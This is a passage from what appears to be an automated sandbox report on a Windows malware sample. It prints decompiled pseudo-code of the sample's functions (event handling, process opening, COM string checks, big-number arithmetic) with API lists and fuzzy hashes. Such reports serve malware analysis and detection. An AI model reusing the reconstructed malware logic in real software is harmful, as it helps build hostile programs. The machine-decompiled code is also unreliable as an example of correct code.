                                                          							L7:
                                                          							_t10 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				if(_t10 == 0xffffffff) {
                                                          					goto L9;
                                                          				}
                                                          				return _t10;
                                                          			}

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,044767B8,?,?,00000000,00000000), ref: 04473E23
                                                          • ResetEvent.KERNEL32(?), ref: 04473E28
                                                          • GetLastError.KERNEL32 ref: 04473E40
                                                          • GetLastError.KERNEL32(?,?,00000102,044767B8,?,?,00000000,00000000), ref: 04473E5B
                                                            • Part of subcall function 04475AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04473E08,?,?,?,?,00000102,044767B8,?,?,00000000), ref: 04475AFD
                                                            • Part of subcall function 04475AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04473E08,?,?,?,?,00000102,044767B8,?), ref: 04475B5B
                                                            • Part of subcall function 04475AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 04475B6B
                                                          • SetEvent.KERNEL32(?), ref: 04473E4E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 26669178f3a1db1d1e4f55914aacb349c5f82141470872af1c396dfbbdb26087
                                                          • Instruction ID: bd8a97c8f25bbeecaea7b37832c986f37c3bb1ec1485c934701bc4a505ac2ede
                                                          • Opcode Fuzzy Hash: 26669178f3a1db1d1e4f55914aacb349c5f82141470872af1c396dfbbdb26087
                                                          • Instruction Fuzzy Hash: 67014F31104241ABFF306F61DC84F9BB7A8EF44764F114A26F991A11E0D721F806EAA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04473E69(intOrPtr _a4) {
                                                          				void* _t2;
                                                          				unsigned int _t4;
                                                          				void* _t5;
                                                          				long _t6;
                                                          				void* _t7;
                                                          				void* _t15;
                                                          
                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                          				 *0x447d26c = _t2;
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				_t4 = GetVersion();
                                                          				if(_t4 != 5) {
                                                          					L4:
                                                          					if(_t15 <= 0) {
                                                          						_t5 = 0x32;
                                                          						return _t5;
                                                          					}
                                                          					L5:
                                                          					 *0x447d25c = _t4;
                                                          					_t6 = GetCurrentProcessId();
                                                          					 *0x447d258 = _t6;
                                                          					 *0x447d264 = _a4;
                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                          					 *0x447d254 = _t7;
                                                          					if(_t7 == 0) {
                                                          						 *0x447d254 =  *0x447d254 | 0xffffffff;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				if(_t4 >> 8 > 0) {
                                                          					goto L5;
                                                          				}
                                                          				_t15 = _t4 - _t4;
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0447131F,?,?,00000001,?,?,?,04474EF2,?), ref: 04473E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04474EF2,?), ref: 04473E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04474EF2,?), ref: 04473E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04474EF2,?), ref: 04473EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04474EF2,?), ref: 04473ED8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: c100e70bc2f87d8d599bebd76eea3e073d1a135212af1c6b4af768b03d096356
                                                          • Instruction ID: c592dbc9b7fc4f5af46f331a9ab440ad54886c53cfd22d5f811c03b59255e168
                                                          • Opcode Fuzzy Hash: c100e70bc2f87d8d599bebd76eea3e073d1a135212af1c6b4af768b03d096356
                                                          • Instruction Fuzzy Hash: BCF0C8B0B603419BFB208F74AC19B5A7B51EB80701F100416EA03D62C0E778E803DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 46%
                                                          			E04476F3A(intOrPtr* __eax) {
                                                          				void* _v8;
                                                          				WCHAR* _v12;
                                                          				void* _v16;
                                                          				char _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v32;
                                                          				intOrPtr _v40;
                                                          				short _v48;
                                                          				intOrPtr _v56;
                                                          				short _v64;
                                                          				intOrPtr* _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t57;
                                                          				intOrPtr* _t58;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				short _t67;
                                                          				intOrPtr* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t72;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t87;
                                                          				intOrPtr _t103;
                                                          				intOrPtr _t109;
                                                          				void* _t118;
                                                          				void* _t122;
                                                          				void* _t123;
                                                          				intOrPtr _t130;
                                                          
                                                          				_t123 = _t122 - 0x3c;
                                                          				_push( &_v8);
                                                          				_push(__eax);
                                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                          				if(_t118 >= 0) {
                                                          					_t54 = _v8;
                                                          					_t103 =  *0x447d2a8; // 0xb9a5a8
                                                          					_t5 = _t103 + 0x447e038; // 0x3050f485
                                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                          					_t56 = _v8;
                                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                          					if(_t118 >= 0) {
                                                          						__imp__#2(0x447c290);
                                                          						_v28 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_t118 = 0x8007000e;
                                                          						} else {
                                                          							_t60 = _v32;
                                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                          							_t87 = __imp__#6;
                                                          							_t118 = _t61;
                                                          							if(_t118 >= 0) {
                                                          								_t63 = _v24;
                                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                          								if(_t118 >= 0) {
                                                          									_t130 = _v20;
                                                          									if(_t130 != 0) {
                                                          										_t67 = 3;
                                                          										_v64 = _t67;
                                                          										_v48 = _t67;
                                                          										_v56 = 0;
                                                          										_v40 = 0;
                                                          										if(_t130 > 0) {
                                                          											while(1) {
                                                          												_t68 = _v24;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t123 = _t123;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                          												if(_t118 < 0) {
                                                          													goto L16;
                                                          												}
                                                          												_t70 = _v8;
                                                          												_t109 =  *0x447d2a8; // 0xb9a5a8
                                                          												_t28 = _t109 + 0x447e0bc; // 0x3050f1ff
                                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                          												if(_t118 >= 0) {
                                                          													_t75 = _v16;
                                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                          														_t79 =  *0x447d2a8; // 0xb9a5a8
                                                          														_t33 = _t79 + 0x447e078; // 0x76006f
                                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                                          															_t83 = _v16;
                                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                          														}
                                                          														 *_t87(_v12);
                                                          													}
                                                          													_t77 = _v16;
                                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                          												}
                                                          												_t72 = _v8;
                                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                          												_v40 = _v40 + 1;
                                                          												if(_v40 < _v20) {
                                                          													continue;
                                                          												}
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								L16:
                                                          								_t65 = _v24;
                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          							}
                                                          							 *_t87(_v28);
                                                          						}
                                                          						_t58 = _v32;
                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                          					}
                                                          				}
                                                          				return _t118;
                                                          			}

                                                          APIs
                                                          • SysAllocString.OLEAUT32(0447C290), ref: 04476F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 0447706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04477084
                                                          • SysFreeString.OLEAUT32(?), ref: 044770B3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: b60039ecdb5fab12909630567280234b848ffeabf4179e2254f930a54287d266
                                                          • Instruction ID: e6011c050a421bdafc57434c2decef070c4d367845bab04188771521fc065dcc
                                                          • Opcode Fuzzy Hash: b60039ecdb5fab12909630567280234b848ffeabf4179e2254f930a54287d266
                                                          • Instruction Fuzzy Hash: BA512C75D00519EFCF10DFE8C8889EEB7BAEF88704B158599E915EB211D731AD42CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E044753C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				void _v92;
                                                          				void _v236;
                                                          				void* _t55;
                                                          				unsigned int _t56;
                                                          				signed int _t66;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				signed int _t79;
                                                          				void* _t81;
                                                          				void* _t92;
                                                          				void* _t96;
                                                          				signed int* _t99;
                                                          				signed int _t101;
                                                          				signed int _t103;
                                                          				void* _t107;
                                                          
                                                          				_t92 = _a12;
                                                          				_t101 = __eax;
                                                          				_t55 = E04471AD1(_a16, _t92);
                                                          				_t79 = _t55;
                                                          				if(_t79 == 0) {
                                                          					L18:
                                                          					return _t55;
                                                          				}
                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                          				_t81 = 0;
                                                          				_t96 = 0x20;
                                                          				if(_t56 == 0) {
                                                          					L4:
                                                          					_t97 = _t96 - _t81;
                                                          					_v12 = _t96 - _t81;
                                                          					E044750FF(_t79,  &_v236);
                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04475745(_t101,  &_v236, _a8, _t96 - _t81);
                                                          					E04475745(_t79,  &_v92, _a12, _t97);
                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                          					_t66 = E044750FF(_t101, 0x447d1b0);
                                                          					_t103 = _t101 - _t79;
                                                          					_a8 = _t103;
                                                          					if(_t103 < 0) {
                                                          						L17:
                                                          						E044750FF(_a16, _a4);
                                                          						E04475088(_t79,  &_v236, _a4, _t97);
                                                          						memset( &_v236, 0, 0x8c);
                                                          						_t55 = memset( &_v92, 0, 0x44);
                                                          						goto L18;
                                                          					}
                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                          					do {
                                                          						if(_v8 != 0xffffffff) {
                                                          							_push(1);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push( *_t99);
                                                          							L0447AF2E();
                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                          							asm("adc edx, esi");
                                                          							_push(0);
                                                          							_push(_v8 + 1);
                                                          							_push(_t92);
                                                          							_push(_t74);
                                                          							L0447AF28();
                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                          								_t74 = _t74 | 0xffffffff;
                                                          								_v16 = _v16 & 0x00000000;
                                                          							}
                                                          						} else {
                                                          							_t74 =  *_t99;
                                                          						}
                                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                          						_a12 = _t74;
                                                          						_t76 = E04475F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                          						while(1) {
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							L13:
                                                          							_t92 =  &_v92;
                                                          							if(E044790C2(_t79, _t92, _t106) < 0) {
                                                          								break;
                                                          							}
                                                          							L14:
                                                          							_a12 = _a12 + 1;
                                                          							_t76 = E04476044(_t79,  &_v92, _t106, _t106);
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						_a8 = _a8 - 1;
                                                          						_t66 = _a12;
                                                          						_t99 = _t99 - 4;
                                                          						 *(0x447d1b0 + _a8 * 4) = _t66;
                                                          					} while (_a8 >= 0);
                                                          					_t97 = _v12;
                                                          					goto L17;
                                                          				}
                                                          				while(_t81 < _t96) {
                                                          					_t81 = _t81 + 1;
                                                          					_t56 = _t56 >> 1;
                                                          					if(_t56 != 0) {
                                                          						continue;
                                                          					}
                                                          					goto L4;
                                                          				}
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04475473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04475489
                                                          • memset.NTDLL ref: 04475529
                                                          • memset.NTDLL ref: 04475539
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 434e9942c95311ff425c2a320c61521ecf02902b0b50532450f5667a00f7e1a5
                                                          • Instruction ID: 7aa6d52d125c0714bae38f298f0908d7aaa1f48987b3bf0fd4b1e6edd935c32a
                                                          • Opcode Fuzzy Hash: 434e9942c95311ff425c2a320c61521ecf02902b0b50532450f5667a00f7e1a5
                                                          • Instruction Fuzzy Hash: 3B41A071A00259BBEF10DFA9CC41BDE7775EF44314F10852AF90AAB681DB70B9568B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 0447A82E
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • ResetEvent.KERNEL32(?), ref: 0447A8A2
                                                          • GetLastError.KERNEL32 ref: 0447A8C5
                                                          • GetLastError.KERNEL32 ref: 0447A970
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: dd001b888183037a5f745c52db0b8aab1f72be9f413c781477844c2a4d146bcb
                                                          • Instruction ID: 75a966e8fb76304dd4fb6092acb55a34e40cdab1618c1107eb0c57e9f644309e
                                                          • Opcode Fuzzy Hash: dd001b888183037a5f745c52db0b8aab1f72be9f413c781477844c2a4d146bcb
                                                          • Instruction Fuzzy Hash: 21418FB1500604BFEB319FA1DC88E9F7BBDEF85740B10492AF542E1191E735A956CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 42%
                                                          			E044715FF(void* __eax, void* __ecx) {
                                                          				char _v8;
                                                          				void* _v12;
                                                          				intOrPtr _v16;
                                                          				char _v20;
                                                          				void* __esi;
                                                          				void* _t30;
                                                          				intOrPtr _t38;
                                                          				intOrPtr* _t39;
                                                          				intOrPtr* _t41;
                                                          				void* _t54;
                                                          				long _t64;
                                                          				void* _t67;
                                                          				void* _t69;
                                                          
                                                          				_t58 = __ecx;
                                                          				_t67 = __eax;
                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                          					L2:
                                                          					_t30 = _t67;
                                                          					_pop(_t68);
                                                          					_t69 = _t30;
                                                          					_t64 = 0;
                                                          					ResetEvent( *(_t69 + 0x1c));
                                                          					_push( &_v8);
                                                          					_push(4);
                                                          					_push( &_v20);
                                                          					_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          					if( *0x447d134() != 0) {
                                                          						L9:
                                                          						if(_v8 == 0) {
                                                          							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                          						} else {
                                                          							 *0x447d164(0, 1,  &_v12);
                                                          							if(0 != 0) {
                                                          								_t64 = 8;
                                                          							} else {
                                                          								_t38 = E0447A71F(0x1000);
                                                          								_v16 = _t38;
                                                          								if(_t38 == 0) {
                                                          									_t64 = 8;
                                                          								} else {
                                                          									_push(0);
                                                          									_push(_v8);
                                                          									_push( &_v20);
                                                          									while(1) {
                                                          										_t41 = _v12;
                                                          										_t61 =  *_t41;
                                                          										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                          										ResetEvent( *(_t69 + 0x1c));
                                                          										_push( &_v8);
                                                          										_push(0x1000);
                                                          										_push(_v16);
                                                          										_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          										if( *0x447d134() != 0) {
                                                          											goto L17;
                                                          										}
                                                          										_t64 = GetLastError();
                                                          										if(_t64 == 0x3e5) {
                                                          											_t64 = E04475646( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                          											if(_t64 == 0) {
                                                          												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          												if(_t64 == 0) {
                                                          													goto L17;
                                                          												}
                                                          											}
                                                          										}
                                                          										L19:
                                                          										E0447A734(_v16);
                                                          										if(_t64 == 0) {
                                                          											_t64 = E044770CC(_v12, _t69);
                                                          										}
                                                          										goto L22;
                                                          										L17:
                                                          										_t64 = 0;
                                                          										if(_v8 != 0) {
                                                          											_push(0);
                                                          											_push(_v8);
                                                          											_push(_v16);
                                                          											continue;
                                                          										}
                                                          										goto L19;
                                                          									}
                                                          								}
                                                          								L22:
                                                          								_t39 = _v12;
                                                          								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t64 = GetLastError();
                                                          						if(_t64 != 0x3e5) {
                                                          							L8:
                                                          							if(_t64 == 0) {
                                                          								goto L9;
                                                          							}
                                                          						} else {
                                                          							_t64 = E04475646( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                          							if(_t64 == 0) {
                                                          								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					return _t64;
                                                          				} else {
                                                          					_t54 = E04479242(__ecx, __eax);
                                                          					if(_t54 != 0) {
                                                          						return _t54;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          			}

















                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 044718EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 04471907
                                                          • ResetEvent.KERNEL32(?), ref: 04471980
                                                          • GetLastError.KERNEL32 ref: 0447199B
                                                            • Part of subcall function 04479242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04479259
                                                            • Part of subcall function 04479242: SetEvent.KERNEL32(?), ref: 04479269
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 419cdffdcd713ff7da7ad941bdc038266df57fc870bbf37f29aa75f29bce9d35
                                                          • Instruction ID: 802596b00444601327592940d2bf1150ab6422fc04f6ae4cfa482477734524c4
                                                          • Opcode Fuzzy Hash: 419cdffdcd713ff7da7ad941bdc038266df57fc870bbf37f29aa75f29bce9d35
                                                          • Instruction Fuzzy Hash: 8441B172600604ABDF219FA5CC84AEFB7B9EF84265F10052AE551E7351EA30F903DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 04473B0D
                                                          • SysAllocString.OLEAUT32(044785ED), ref: 04473B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04473B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04473B73
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 9cd3148ce0f5a996c725988ddc7f403bd89bbd967d89f4290ea4917f031e78ca
                                                          • Instruction ID: 500561a3b0b7730e53cdd106dd40a25e54dfbd802d9ee3db1ed64d980d0c3d62
                                                          • Opcode Fuzzy Hash: 9cd3148ce0f5a996c725988ddc7f403bd89bbd967d89f4290ea4917f031e78ca
                                                          • Instruction Fuzzy Hash: 96310E71900249EFDF14DFA8D8C08EEBBB9FF48340B10842EF90697251D734AA42DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E044711EE(signed int _a4, signed int* _a8) {
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				signed int _t6;
                                                          				intOrPtr _t8;
                                                          				intOrPtr _t12;
                                                          				short* _t19;
                                                          				void* _t25;
                                                          				signed int* _t28;
                                                          				CHAR* _t30;
                                                          				long _t31;
                                                          				intOrPtr* _t32;
                                                          
                                                          				_t6 =  *0x447d270; // 0xd448b889
                                                          				_t32 = _a4;
                                                          				_a4 = _t6 ^ 0x109a6410;
                                                          				_t8 =  *0x447d2a8; // 0xb9a5a8
                                                          				_t3 = _t8 + 0x447e87e; // 0x61636f4c
                                                          				_t25 = 0;
                                                          				_t30 = E044738A8(_t3, 1);
                                                          				if(_t30 != 0) {
                                                          					_t25 = CreateEventA(0x447d2ac, 1, 0, _t30);
                                                          					E0447A734(_t30);
                                                          				}
                                                          				_t12 =  *0x447d25c; // 0x4000000a
                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E0447A65C() != 0) {
                                                          					L12:
                                                          					_t28 = _a8;
                                                          					if(_t28 != 0) {
                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                          					}
                                                          					_t31 = E04478EA1(_t32, 0);
                                                          					if(_t31 == 0 && _t25 != 0) {
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          					}
                                                          					if(_t28 != 0 && _t31 != 0) {
                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                          					}
                                                          					goto L20;
                                                          				} else {
                                                          					_t19 =  *0x447d10c( *_t32, 0x20);
                                                          					if(_t19 != 0) {
                                                          						 *_t19 = 0;
                                                          						_t19 = _t19 + 2;
                                                          					}
                                                          					_t31 = E0447A273(0,  *_t32, _t19, 0);
                                                          					if(_t31 == 0) {
                                                          						if(_t25 == 0) {
                                                          							L22:
                                                          							return _t31;
                                                          						}
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          						if(_t31 == 0) {
                                                          							L20:
                                                          							if(_t25 != 0) {
                                                          								CloseHandle(_t25);
                                                          							}
                                                          							goto L22;
                                                          						}
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          			}















                                                          APIs
                                                            • Part of subcall function 044738A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,05019A98,00000000,?,?,63699BC3,00000005,0447D00C,?,?,04475D30), ref: 044738DE
                                                            • Part of subcall function 044738A8: lstrcpy.KERNEL32(00000000,00000000), ref: 04473902
                                                            • Part of subcall function 044738A8: lstrcat.KERNEL32(00000000,00000000), ref: 0447390A
                                                          • CreateEventA.KERNEL32(0447D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04473760,?,00000001,?), ref: 0447122F
                                                            • Part of subcall function 0447A734: HeapFree.KERNEL32(00000000,00000000,04475637,00000000,?,?,00000000), ref: 0447A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04473760,00000000,00000000,?,00000000,?,04473760,?,00000001,?,?,?,?,044752AA), ref: 0447128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04473760,?,00000001,?), ref: 044712BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04473760,?,00000001,?,?,?,?,044752AA), ref: 044712D5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: b71b32cdb8e2ef9bd4cdac2c3f538372dfc1a4012e005e65a6370f7f56e84bb3
                                                          • Instruction ID: f521b11768e7b18a1c05cb809e820cb59dd483b256eb899e47723aafcbcd60be
                                                          • Opcode Fuzzy Hash: b71b32cdb8e2ef9bd4cdac2c3f538372dfc1a4012e005e65a6370f7f56e84bb3
                                                          • Instruction Fuzzy Hash: 2321C332A002505BEF315AA99C84AEBF3A9FF85711F15062BFF45F7341DB64E9038694
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E04479242(void* __ecx, void* __esi) {
                                                          				char _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				long _v20;
                                                          				long _t34;
                                                          				long _t39;
                                                          				long _t42;
                                                          				long _t56;
                                                          				intOrPtr _t58;
                                                          				void* _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          
                                                          				_t61 = __esi;
                                                          				_t59 = __ecx;
                                                          				_t60 =  *0x447d13c; // 0x447abf1
                                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                          				do {
                                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                          					_v20 = _t34;
                                                          					if(_t34 != 0) {
                                                          						L3:
                                                          						_push( &_v16);
                                                          						_push( &_v8);
                                                          						_push(_t61 + 0x2c);
                                                          						_push(0x20000013);
